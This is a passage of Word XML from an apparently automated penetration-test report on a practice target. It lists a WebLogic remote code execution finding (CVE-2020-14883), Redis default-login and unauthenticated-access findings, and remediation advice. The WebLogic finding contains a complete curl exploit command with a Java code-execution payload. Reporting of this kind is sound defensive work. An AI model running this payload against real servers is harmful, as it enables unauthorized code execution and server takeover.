    <w:p w14:paraId="1AB29247" w14:textId="2D5417E0" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.6 Oracle Fusion Middleware WebLogic Server Administration Console - Remote Code Execution (CVE-2020-14883)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="30AF5214" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4FA26A2F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="24D0765A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="6C591609" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="48720619" wp14:editId="5960B589">
                  <wp:extent cx="1397000" cy="1397000"/>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0B08D222" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50EC9804" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F90A79F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
          <w:p w14:paraId="0B7B5442" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Port: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="434343"/>
              </w:rPr>
              <w:t>7001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="155C251F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6C721AD8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="707CCF05" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We managed to detect this vulnerability using the following Request / Response chain.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Endpoint: https://pentest-ground.com:7001/console/images/%252e%252e%252fconsole.portal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F1EEB13" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>How to reproduce</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602D2645" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableCodeblock"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9848"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="1972F6F8" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F221456" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:t>curl -X 'POST' \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>-d 'test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('\''weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String result = new StringBuilder("2sL5MlSCjh9IWIa8iqf8pDSmOHc").reverse().toString(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush(); currentThread.interrupt();'\'')' \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>-H 'Accept-Encoding: gzip, deflate' \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>-H 'Accept-Language: en' \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>-H 'Content-Type: application/x-www-form-urlencoded' \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>-H 'Host: pentest-ground.com:7001' \</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Roboto Mono" w:hAnsi="Roboto Mono"/>
              </w:rPr>
              <w:br/>
              <w:t>-H 'User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36' 'https://pentest-ground.com:7001/console/images/%252e%252e%252fconsole.portal'</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A7945C2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4976101F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The Oracle Fusion Middleware WebLogic Server admin console in versions 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 is vulnerable to an easily exploitable vulnerability that allows high privileged attackers with network access via HTTP to compromise Oracle WebLogic Server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51555DA3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F61107" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk exists that a remote unauthenticated attacker can fully compromise the server to steal confidential information, install ransomware, or pivot to the internal network.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F81914" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CE6DE71" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF08E83" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A97FC01" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId210">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="03AB5FA0" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId211">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-14883</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="60802582" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId212">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.oracle.com/security-alerts/cpuoct2020.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2F2BE8C2" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId213">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>http://packetstormsecurity.com/files/160143/Oracle-WebLogic-Server-Administration-Console-Handle-Remote-Code-Execution.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="428D2FF8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId214">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/1n7erface/PocList</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3D762099" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Classification</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrayHeader"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="4680"/>
        <w:gridCol w:w="4680"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="0FD7D06E" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:trPr>
          <w:cnfStyle w:val="100000000000" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:oddVBand="0" w:evenVBand="0" w:oddHBand="0" w:evenHBand="0" w:firstRowFirstColumn="0" w:firstRowLastColumn="0" w:lastRowFirstColumn="0" w:lastRowLastColumn="0"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="77CD6FCF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F475D6D" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>ID / Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="029D4984" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6563B76B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D806B33" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>CVE-2020-14883</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6719F317" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="698FA4A7" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46AC8FB5" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6511E1F4" w14:textId="1CD9AB0F" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.7 Redis - Default Logins</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="4BF30844" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7A162740" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3EECCBBE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="1D511DDA" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E213B68" wp14:editId="0BF1018A">
                  <wp:extent cx="1397000" cy="1397000"/>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380A6F8B" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4590EAE6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="63905D5B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
          <w:p w14:paraId="345A6A2A" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Port: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="434343"/>
              </w:rPr>
              <w:t>6379</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="0BA79BA3" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0365EB3C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77FE1810" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We managed to detect that the target server is set up with a default credential pair.</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>We extracted the following information from the target: pentest-ground.com:6379</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Authentication was performed without credentials.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Username: ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Password: ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69EE11A6" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D280676" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Redis service was accessed with easily guessed credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338CD20E" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Risk description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C634039" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>The risk exist that a remote attacker could take advantage of the default credentials for taking over the default account. If an authenticated vulnerability is present on the machine, it could also be leveraged to exploit the target, compromising the underlying system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A39C14" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA78F26" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Change the default login credentials. Use a strong password, at least 10 characters long, preferably randomly generated. Unless the login panel is intended to be exposed to the internet, we strongly recommend placing it behind a firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="702B5D26" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AA16B6C" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA2E860" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB9720E" w14:textId="1F822889" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.8 Redis Server - Unauthenticated Access</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DD22C7" w14:paraId="711DCE38" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7160" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E59725B" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t>Affected target</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3884DCC8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:pPr>
              <w:pStyle w:val="Subtitle"/>
            </w:pPr>
            <w:r>
              <w:t>pentest-ground.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2200" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
          </w:tcPr>
          <w:p w14:paraId="5C16C8AF" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="37D4CF3E" wp14:editId="7A1F5BA1">
                  <wp:extent cx="1397000" cy="1397000"/>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isk.png"/>
                          <pic:cNvPicPr/>
                        </pic:nvPicPr>
                        <pic:blipFill>
                          <a:blip r:embed="rId35"/>
                          <a:stretch>
                            <a:fillRect/>
                          </a:stretch>
                        </pic:blipFill>
                        <pic:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1397000" cy="1397000"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                    </a:graphicData>
                  </a:graphic>
                </wp:inline>
              </w:drawing>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DD22C7" w14:paraId="372037EF" w14:textId="77777777" w:rsidTr="00DD22C7">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1F7D22B9" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Status: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="999999"/>
              </w:rPr>
              <w:t>Open</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EA9C7BC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
          <w:p w14:paraId="7260376F" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
            <w:r>
              <w:t xml:space="preserve">Port: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="434343"/>
              </w:rPr>
              <w:t>6379</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4680" w:type="dxa"/>
            <w:vMerge/>
          </w:tcPr>
          <w:p w14:paraId="703B89BE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6A0E93AE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Evidence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C445B78" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We managed to detect a Redis Server - Unauthenticated Access, using the following Request / Response chain.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7575DB97" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Vulnerability description</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45761742" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>Redis server without any required authentication was discovered.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E670BED" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Recommendation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="324171D8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:t>We recommend you to analyze if this resource should be available or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B930C8" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>References</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42911CCE" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00DD22C7">
      <w:hyperlink r:id="rId215">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://redis.io/topics/security</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="540AF4DC" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Subtitle"/>
      </w:pPr>
      <w:r>
        <w:t>Verification</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43607696" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:hAnsi="MS Gothic"/>
          <w:color w:val="82AF6F"/>
        </w:rPr>
        <w:t>✔</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> This finding was validated so it is not a False Positive.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B22A16" w14:textId="77777777" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0586C6" w14:textId="6D17B4B8" w:rsidR="00DD22C7" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>4.2.9 SSH service exposed to the Internet</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="DefaultTableStyle"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="7160"/>
        <w:gridCol w:w="2688"/>
      </w:tblGrid>
